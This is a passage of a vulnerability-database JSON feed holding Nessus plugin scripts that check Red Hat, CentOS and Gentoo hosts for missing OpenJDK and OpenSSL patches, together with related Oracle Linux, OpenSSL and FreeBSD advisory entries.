value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0135\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:36:47", "description": "Updated java-1.6.0-openjdk packages that fix several security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.\n\nIt was discovered that Java2D did not properly check graphics rendering objects before passing them to the native renderer.\nMalicious input, or an untrusted Java application or applet could use this flaw to crash the Java Virtual Machine (JVM), or bypass Java sandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that the exception thrown on deserialization failure did not always contain a proper identification of the cause of the failure. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions. (CVE-2012-0505)\n\nThe AtomicReferenceArray class implementation did not properly check if the array was of the expected Object[] type. A malicious Java application or applet could use this flaw to bypass Java sandbox restrictions. (CVE-2011-3571)\n\nIt was discovered that the use of TimeZone.setDefault() was not restricted by the SecurityManager, allowing an untrusted Java application or applet to set a new default time zone, and hence bypass Java sandbox restrictions. (CVE-2012-0503)\n\nThe HttpServer class did not limit the number of headers read from HTTP requests. A remote attacker could use this flaw to make an application using HttpServer use an excessive amount of CPU time via a specially crafted request. This update introduces a header count limit controlled using the sun.net.httpserver.maxReqHeaders property. The default value is 200. (CVE-2011-5035)\n\nThe Java Sound component did not properly check buffer boundaries.\nMalicious input, or an untrusted Java application or applet could use this flaw to cause the Java Virtual Machine (JVM) to crash or disclose a portion of its memory. (CVE-2011-3563)\n\nA flaw was found in the AWT KeyboardFocusManager that could allow an untrusted Java application or applet to acquire keyboard focus and possibly steal sensitive information. (CVE-2012-0502)\n\nIt was discovered that the CORBA (Common Object Request Broker Architecture) implementation in Java did not properly protect repository identifiers on certain CORBA objects. This could have been used to modify immutable object data. (CVE-2012-0506)\n\nAn off-by-one flaw, causing a stack overflow, was found in the unpacker for ZIP files. A specially crafted ZIP archive could cause the Java Virtual Machine (JVM) to crash when opened. (CVE-2012-0501)\n\nNote: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.6.\nRefer to the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "cvss3": {}, "published": "2012-02-16T00:00:00", "type": "nessus", "title": "CentOS 6 : java-1.6.0-openjdk (CESA-2012:0135)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2011-3571", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-0507"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:centos:centos:java-1.6.0-openjdk", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-demo", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-devel", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-javadoc", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-src", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2012-0135.NASL", "href": "https://www.tenable.com/plugins/nessus/57961", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0135 and \n# CentOS Errata and Security Advisory 2012:0135 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57961);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2011-3563\",\n \"CVE-2011-3571\",\n \"CVE-2011-5035\",\n \"CVE-2012-0497\",\n \"CVE-2012-0501\",\n \"CVE-2012-0502\",\n \"CVE-2012-0503\",\n \"CVE-2012-0505\",\n \"CVE-2012-0506\",\n \"CVE-2012-0507\"\n );\n script_bugtraq_id(\n 51194,\n 51467,\n 52009,\n 52011,\n 52012,\n 52013,\n 52014,\n 52017,\n 52018\n );\n script_xref(name:\"RHSA\", value:\"2012:0135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"CentOS 6 : java-1.6.0-openjdk (CESA-2012:0135)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated java-1.6.0-openjdk packages that fix several security issues\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that Java2D did not properly check graphics\nrendering objects before passing them to the native renderer.\nMalicious input, or an untrusted Java application or applet could use\nthis flaw to crash the Java Virtual Machine (JVM), or bypass Java\nsandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that the exception thrown on deserialization failure\ndid not always contain a proper identification of the cause of the\nfailure. An untrusted Java application or applet could use this flaw\nto bypass Java sandbox restrictions. (CVE-2012-0505)\n\nThe AtomicReferenceArray class implementation did not properly check\nif the array was of the expected Object[] type. A malicious Java\napplication or applet could use this flaw to bypass Java sandbox\nrestrictions. (CVE-2011-3571)\n\nIt was discovered that the use of TimeZone.setDefault() was not\nrestricted by the SecurityManager, allowing an untrusted Java\napplication or applet to set a new default time zone, and hence bypass\nJava sandbox restrictions. (CVE-2012-0503)\n\nThe HttpServer class did not limit the number of headers read from\nHTTP requests. A remote attacker could use this flaw to make an\napplication using HttpServer use an excessive amount of CPU time via a\nspecially crafted request. This update introduces a header count limit\ncontrolled using the sun.net.httpserver.maxReqHeaders property. The\ndefault value is 200. (CVE-2011-5035)\n\nThe Java Sound component did not properly check buffer boundaries.\nMalicious input, or an untrusted Java application or applet could use\nthis flaw to cause the Java Virtual Machine (JVM) to crash or disclose\na portion of its memory. (CVE-2011-3563)\n\nA flaw was found in the AWT KeyboardFocusManager that could allow an\nuntrusted Java application or applet to acquire keyboard focus and\npossibly steal sensitive information. (CVE-2012-0502)\n\nIt was discovered that the CORBA (Common Object Request Broker\nArchitecture) implementation in Java did not properly protect\nrepository identifiers on certain CORBA objects. This could have been\nused to modify immutable object data. (CVE-2012-0506)\n\nAn off-by-one flaw, causing a stack overflow, was found in the\nunpacker for ZIP files. A specially crafted ZIP archive could cause\nthe Java Virtual Machine (JVM) to crash when opened. (CVE-2012-0501)\n\nNote: If the web browser plug-in provided by the icedtea-web package\nwas installed, the issues exposed via Java applets could have been\nexploited without user interaction if a user visited a malicious\nwebsite.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.6.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\");\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018437.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4bf0267f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.6.0-openjdk packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0507\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java AtomicReferenceArray Type Violation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:45:00", "description": "The remote host is affected by the vulnerability described in GLSA-201312-03 (OpenSSL: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Remote attackers can determine private keys, decrypt data, cause a Denial of Service or possibly have other unspecified impact.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2013-12-03T00:00:00", "type": "nessus", "title": "GLSA-201312-03 : OpenSSL: Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-7250", "CVE-2011-1945", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-2110", "CVE-2012-2333", "CVE-2012-2686", "CVE-2013-0166", "CVE-2013-0169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:openssl", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201312-03.NASL", "href": "https://www.tenable.com/plugins/nessus/71169", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201312-03.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71169);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2006-7250\",\n \"CVE-2011-1945\",\n \"CVE-2012-0884\",\n \"CVE-2012-1165\",\n \"CVE-2012-2110\",\n \"CVE-2012-2333\",\n \"CVE-2012-2686\",\n \"CVE-2013-0166\",\n \"CVE-2013-0169\"\n );\n script_bugtraq_id(\n 47888,\n 52181,\n 52428,\n 52764,\n 53158,\n 53476,\n 57755,\n 57778,\n 60268\n );\n script_xref(name:\"GLSA\", value:\"201312-03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"GLSA-201312-03 : OpenSSL: Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201312-03\n(OpenSSL: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenSSL. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n Remote attackers can determine private keys, decrypt data, cause a\n Denial of Service or possibly have other unspecified impact.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201312-03\");\n script_set_attribute(attribute:\"solution\", value:\n\"All OpenSSL 1.0.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-1.0.0j'\n All OpenSSL 0.9.8 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-0.9.8y'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/openssl\", unaffected:make_list(\"ge 1.0.0j\", \"rge 0.9.8y\", \"rge 0.9.8z_p1\", \"rge 0.9.8z_p2\", \"rge 0.9.8z_p3\", \"rge 0.9.8z_p4\", \"rge 0.9.8z_p5\", \"rge 0.9.8z_p6\", \"rge 0.9.8z_p7\", \"rge 0.9.8z_p8\", \"rge 0.9.8z_p9\", \"rge 0.9.8z_p10\", \"rge 0.9.8z_p11\", \"rge 0.9.8z_p12\", \"rge 0.9.8z_p13\", \"rge 0.9.8z_p14\", \"rge 0.9.8z_p15\"), vulnerable:make_list(\"lt 1.0.0j\", \"lt 0.9.8y\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenSSL\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:48", "description": "[0.9.7a-43.18.0.1]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)\n backport of OL5 patch 0.9.7a-11.2 by Tomas Mraz ", "cvss3": {}, "published": "2012-05-08T00:00:00", "type": "oraclelinux", "title": "openssl security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2012-05-08T00:00:00", "id": "ELSA-2012-2011", "href": "http://linux.oracle.com/errata/ELSA-2012-2011.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:21", "description": "openssl:\n[1.0.0-20.4]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)\nopenssl098e:\n[0.9.8e-17.el6_2.2]\n- Updated the description\n[0.9.8e-17.2]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "oraclelinux", "title": "openssl security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-25T00:00:00", "id": "ELSA-2012-0518", "href": "http://linux.oracle.com/errata/ELSA-2012-0518.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:56", "description": "[0.9.8e-18.0.1.el6_5.2]\n- Updated the description\n[0.9.8e-18.2]\n- fix for CVE-2014-0224 - SSL/TLS MITM vulnerability\n[0.9.8e-18]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)", "cvss3": {}, "published": "2014-06-05T00:00:00", "type": "oraclelinux", "title": "openssl097a and openssl098e security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0224", "CVE-2012-2110"], "modified": "2014-06-05T00:00:00", "id": "ELSA-2014-0626", "href": "http://linux.oracle.com/errata/ELSA-2014-0626.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:08", "description": "[1:1.6.0.0-1.43.1.10.6]\n- Updated to IcedTea6 1.10.6\n- Resolves: rhbz#787144\n- Security fixes\n - S7082299: Fix in AtomicReferenceArray\n - S7088367: Fix issues in java sound\n - S7110683: Issues with some KeyboardFocusManager method\n - S7110687: Issues with TimeZone class\n - S7110700: Enhance exception throwing mechanism in ObjectStreamClass\n - S7110704: Issues with some method in corba\n - S7112642: Incorrect checking for graphics rendering object\n - S7118283: Better input parameter checking in zip file processing\n - S7126960: Add property to limit number of request headers to the HTTP Server\n- Bug fixes\n - RH580478: Desktop files should not use hardcoded path\n- Removed upstreamed patch7 - java-1.6.0-openjdk-6_2-Z-rmi-fix.patch", "cvss3": {}, "published": "2012-02-15T00:00:00", "type": "oraclelinux", "title": "java-1.6.0-openjdk security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2012-0507", "CVE-2012-0503", "CVE-2011-5035", "CVE-2011-3571", "CVE-2012-0506", "CVE-2012-0497", "CVE-2012-0505", "CVE-2012-0501", "CVE-2012-0502"], "modified": "2012-02-15T00:00:00", "id": "ELSA-2012-0135", "href": "http://linux.oracle.com/errata/ELSA-2012-0135.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openssl": [{"lastseen": "2023-12-06T15:50:01", "description": " Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL\u2019s I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. \n", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "openssl", "title": "Vulnerability in OpenSSL - ASN1 BIO vulnerability ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-19T00:00:00", "id": "OPENSSL:CVE-2012-2110", "href": "https://www.openssl.org/news/secadv/20120419.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T20:48:28", "description": " It was discovered that the fix for CVE-2012-2110 released on 19 Apr 2012 was not sufficient to correct the issue for OpenSSL 0.9.8. This issue only affects OpenSSL 0.9.8v. OpenSSL 1.0.1a and 1.0.0i already contain a patch sufficient to correct CVE-2012-2110. \n", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "openssl", "title": "Vulnerability in OpenSSL - ASN1 BIO incomplete fix ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2012-04-24T00:00:00", "id": "OPENSSL:CVE-2012-2131", "href": "https://www.openssl.org/news/secadv/20120424.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2023-12-06T15:47:21", "description": "\n\nOpenSSL security team reports:\n\nA potentially exploitable vulnerability has been discovered in the OpenSSL\n\t function asn1_d2i_read_bio.\n\t Any application which uses BIO or FILE based functions to read untrusted DER\n\t format data is vulnerable. Affected functions are of the form d2i_*_bio or\n\t d2i_*_fp, for example d2i_X509_bio or d2i_PKCS12_fp.\n\n\n", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "freebsd", "title": "OpenSSL -- integer conversions result in memory corruption", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2012-04-19T00:00:00", "id": 